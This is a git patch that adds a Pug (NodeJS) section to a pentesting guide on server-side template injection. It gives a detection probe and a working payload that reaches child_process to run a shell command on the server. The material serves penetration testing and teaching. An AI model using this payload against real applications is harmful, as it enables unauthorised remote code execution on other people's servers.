From c08b86f73bd232c5a180c0118171c1052e99cbfe Mon Sep 17 00:00:00 2001
From: LGR <30753137+looCiprian@users.noreply.github.com>
Date: Sat, 9 Jan 2021 11:15:51 +0100
Subject: [PATCH] Added PugJs SSTI

---
 pentesting-web/ssti-server-side-template-injection.md | 9 +++++++++
 1 file changed, 9 insertions(+)

diff --git a/pentesting-web/ssti-server-side-template-injection.md b/pentesting-web/ssti-server-side-template-injection.md
index 97b6a4d7..a90cbe72 100644
--- a/pentesting-web/ssti-server-side-template-injection.md
+++ b/pentesting-web/ssti-server-side-template-injection.md
@@ -247,6 +247,15 @@ wrtz%7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d%
 
 * [https://appcheck-ng.com/template-injection-jsrender-jsviews/](https://appcheck-ng.com/template-injection-jsrender-jsviews/)
 
+### PugJj \(NodeJS\)
+
+* #{7*7} = 49
+* #{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('touch /tmp/pwned.txt')}()}
+
+#### More information
+
+* [https://licenciaparahackear.github.io/en/posts/bypassing-a-restrictive-js-sandbox/](https://licenciaparahackear.github.io/en/posts/bypassing-a-restrictive-js-sandbox/)
+
 ### ERB \(Ruby\)
 
 * `{{7*7}} = {{7*7}}`